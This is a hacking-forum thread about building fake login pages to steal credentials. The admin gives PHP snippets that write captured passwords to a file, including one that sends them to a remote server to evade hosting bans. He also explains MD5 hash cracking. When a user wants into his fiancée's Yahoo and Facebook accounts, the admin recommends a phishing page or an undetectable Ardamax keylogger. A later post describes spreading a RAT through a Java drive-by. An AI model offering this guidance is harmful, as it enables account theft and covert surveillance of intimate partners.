Fake login pages. steal info

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.

Re: Fake login pages. steal info

Postby Sethioz » Sat Jan 09, 2010 12:49 pm

could you plz stop asking stupid things ?
as i said, you CAN NOT make a fake page without any knownledge of php/html. did you even took a look at the code ? NO you did not.
what im saying, is that before asking such things, you should go thru the code line by line.
there you will find this

Code: Select all
$handle = fopen("passwords.txt", "a");


this opens a file passwords.txt and writes the following values in it. you can directly modify page too and put formmail in it to make it send info to email/s. you really need knownledge of php. this is not something you can write tutorial for. if i would write tutorial for like paypal.com, then you would say omg its not working on hotmail, ofcourse it will not, because fields and values are not same.
basically you need only basic knownledge of "form". so you know what place to modify.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Sat Jan 09, 2010 1:39 pm

no man what im saying is there must be another place where it is stored

Wat i mean is with out changing anything where are the passwords

So say i make new account called (what) and password (12345) where does the site itself store the passwords because it has to remember your password to login or is it stored on the hosts side(whitch i dought)

and yes your code works but i dont want to be band from every hosting site

and yes i looked at the code if i had not i would not have been ban from the host
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Sat Jan 09, 2010 3:40 pm

well you get banned for
Code: Select all
hosting a fake page, even if it has no malicious code in it, it is illegal to copy a page and then host it. that goes for most of the sites, like yahoo, hotmail..etc.

so what you want, is to still have access to info ?
you want to host a fake page and still have access to stored/stolen login info after your hosting gets banned ?
if thats the case, try modifiying this

Code: Select all
$handle = fopen("passwords.txt", "a");


to this

Code: Select all
$handle = fopen("http://yoursite.com/fakepages/passwords.txt", "a");


however you need to set some permissions for the passwords.txt on your site then (other site).
your site will NOT get banned/cancelled if you have passwords there. i think you can use .htaccess file to allow remote writing into a local file.

for example if i would upload passwords.txt for you into this place:
sethioz.com/stuff/fakepages/passwords.txt
then you have no permissions to write into that file, i would have to give the permissions, but if its public, (CHMOD), then everybody would be able to write into it. so you need to find a way to block everything else, but that one hosting where you put the fake page to allow writing into passwords.txt. you can do all that using .htaccess file i think.
i just dont know .htaccess commands from head, i would google for them too, so do so.

OR if you have public IP (you are not behind router or NAT), then you can make it save directly into your pc, using same method, but again you have to give it a permissions.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Sat Jan 09, 2010 6:21 pm

ok i get that right.. but lets say i am u right.. then U on this not illegal site... want to get my password... on this site....

how would you do that ... bare in mind i had not copied anyones site at that stage.. but sure i put illegal code...

so do u get what im saying

SO basicly Right now i want you to get my password Through this site...

and then tell me how u did that

And try not telling the world wat my password is if u manage to find it
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby 54321 » Sat Jan 09, 2010 6:26 pm

and this is a bit off topic Can you copy paste a spacific site say Gmail.... and get passwords from it... or do you have to create the user name and password BOX so it can be stored
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Sat Jan 09, 2010 8:40 pm

that makes no sense. this code is not illegal. if you got banned from some hosting, it was something else.
only reason why they ban for this is when you copy a page and upload it, this is what this whole thread is about duh.

i already said this before that this example is for paypal. if you have no knownledge of php/html, then you can't do that.
it's like, you can't write, if you don't know how to read < it is simply impossible.
this very example i gave you is taken out of a paypal fake login (100% working).
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Sat Jan 09, 2010 11:47 pm

well 100% got banned with in about 10 seconds after i put code in

BUT still does not answer my question HOW WOULD U GET MY PASSWORD FROM THIS SITE..... YOUR OWN SITE... WHERE IN ftp or where ever would u find BOTH MY USER NAME AND PASSWORD
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Sun Jan 10, 2010 2:17 am

ah ok now i understand. you was confusing before.
well i could get it from database, just get the md5 hash and crack it, but md5 hash crack rate is about 89%, so most likely i would get your pass, unless its some long and hard one.

but i know what you asking. i would just inject a modified code into the index.php, into the <form /form> and make it save the passwords into a "blablabla.txt "file. i won't do that, because it would save ALL passwords (including mine) and it would be disaster if somebody would get that info.
yes i do hack and do evil things, but im not stealing my own site's users passwords or accounts. it would be too lame thing to do.
if you have basic knownledge of php/html, then it is extremely easy to write a code that will save login (POST data) into a file.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Sun Jan 10, 2010 2:19 pm

ahhh thank you for that...so what would the code be.... and big quetion am i gonna be banned again for doing so


and seth how do i re enable php indexing
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Sun Jan 10, 2010 5:51 pm

try to understand that i cannot post you the full code or they would cancel/ban my hosting, which is really not mine. Looney is hosting it.

Code: Select all
<form method="post" name="login_form" action="update.php">


this goes into the page form. update.php will do the work, it will log you either into real page or redirect to real paypal.
AGAIN, you can not do this without basic knownledge of php/html.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Sun Jan 10, 2010 11:00 pm

ok im saying this site now what would the modified code be And U hacking md5 do u do it with program or from expertise


Now bare in mind seth every1(well not evey2)but pretty much 80 to 90% of this forum have no idea what they doing... me... i have sum but compared to you we all look like a bunch of headless chickins that live for 80 years and never seem to die But im asking questions for the future so that you dont have to go through the whole process of this again....... and sure i barly know PHP..... but at 1 stage you never knew about php.... and no dought that at sum stage u asked for a little help...... and im not saying that you not helping those other bunch of wan!er forums Well are a bunch of Wan!ers I mean they give me a warning that (U cannot start your heading with capital letter)omg so i stright out called them all wan!ers
Got banned but who cares
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Sun Jan 10, 2010 11:26 pm

And U hacking md5 do u do it with program or from expertise

not hacking, cracking. only way to crack md5 hash is to collide it with the original string (password).
im using wordlists, bruteforce and rainbow tables.
plz no further discussion about md5 cracking here, its totally offtopic.

as about fake page, check PM on site (not forum pm, but on site).
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Mon Jan 11, 2010 1:27 pm

haha thanks seth... but still all i did was upload the files and again got banned any how im going to try the host that u sugested and see from there
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby dimebag0818 » Sat Mar 27, 2010 10:16 am

Hey guys! How are you? I always go to your page so I decided to sign-up. I have this problem and I want to get some help from you guys...I'm getting married real soon and I think my fiance' is still communicating w/ her ex-boyfriend and it really pisses me off! I just want to make sure if she's really being naughty, I love this girl so much but if she's doing something behind my back I won't hesitate to cancel our wedding. I just wanna check her yahoo mail and her facebook...any help please? thanks in advance!
dimebag0818
Newbie..
Newbie..
 
Posts: 3
Joined: Sat Mar 27, 2010 10:10 am

Re: Fake login pages. steal info

Postby Sethioz » Sat Mar 27, 2010 4:16 pm

this is about fake pages, if you have question about fake login pages, then ask, don't talk about offtopic stuff here.
if you are stating that you want to get a fake page for yahoo or facebook, in order to send your "victim" there, then you can discuss it here.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby dimebag0818 » Sat Mar 27, 2010 4:47 pm

Sorry man, I don't know much about login pages...i just want to see her yahoo and facebook, where can I place my post or the right forum? sorry again...thanks!
dimebag0818
Newbie..
Newbie..
 
Posts: 3
Joined: Sat Mar 27, 2010 10:10 am

Re: Fake login pages. steal info

Postby Sethioz » Sat Mar 27, 2010 5:00 pm

well actually fake page is your best bet, so i guess this is right place. because there are no hacks for yahoo or facebook.
maybe somebody else here is willing to actually write you full page, im not up for this right now, sry.
its not hard tho, you just need basic of php.

you can try keylogger too, but its offtopic already. i suggest ardamax (very easy to use and make your own) read this to know how to make it undetectable > Undetected keylogger - problems and solutions ?!
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby dimebag0818 » Sat Mar 27, 2010 5:06 pm

Thank you so much dude! I'll try to figure it out...take care!
dimebag0818
Newbie..
Newbie..
 
Posts: 3
Joined: Sat Mar 27, 2010 10:10 am

Re: Fake login pages. steal info

Postby Sethioz » Sat Mar 27, 2010 5:37 pm

basically as explained here, you need to first "save page as" and then modifiy the code lil bit to fit a keylogger in it, then you host it and send your victim on it.

the modifiying part is not easiest, but its not hard either. maybe somebody here is willing to make it.
so hey guys, if fake page aint problem for you, make one for yahoo and facebook and attach them.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby ronokae » Sat Feb 11, 2012 8:59 pm

I'm not extremely familiar with this type of thing however a contact of mine has a friend who coded something similar, he hacked peoples accounts on a game.
You could upload your own "mini-server", the program then strips a page of your choice and copies it (or atleast the Java Verification click).
It also uploads a bunch of links, for instance you would put in your own username/pw to enter the Mini server you created
then it you would upload your RAT/Keylogger and it ould give you a bunch of links like
http://www.Javawebcam.com/users/sethioz
http://www.Freepornbelle.net/Page/sethioz
http://Www.runescapepremium/users/sethioz
etc.
If someone was to go to your "site" it would ask them if they wanted to run the Legit-looking java plugin for the site, and the unsuspecting victim upon clicking "Run" would be infected, this is called a Java Driveby if I have my terminology correct, but the method they used is rather unique in that aspect.

ALSO,
I posted a program ealier, a website downloader, I think if you use that to copy a page you could modify it on your own actually, or save-page as.
ronokae
Allie
Allie
 
Posts: 83
Joined: Mon Jan 03, 2011 10:01 pm

PreviousNext

Return to PC / Website / Console / Others > Hacking / Cracking / Exploits / Research

Who is online

Users browsing this forum: No registered users and 2 guests

cron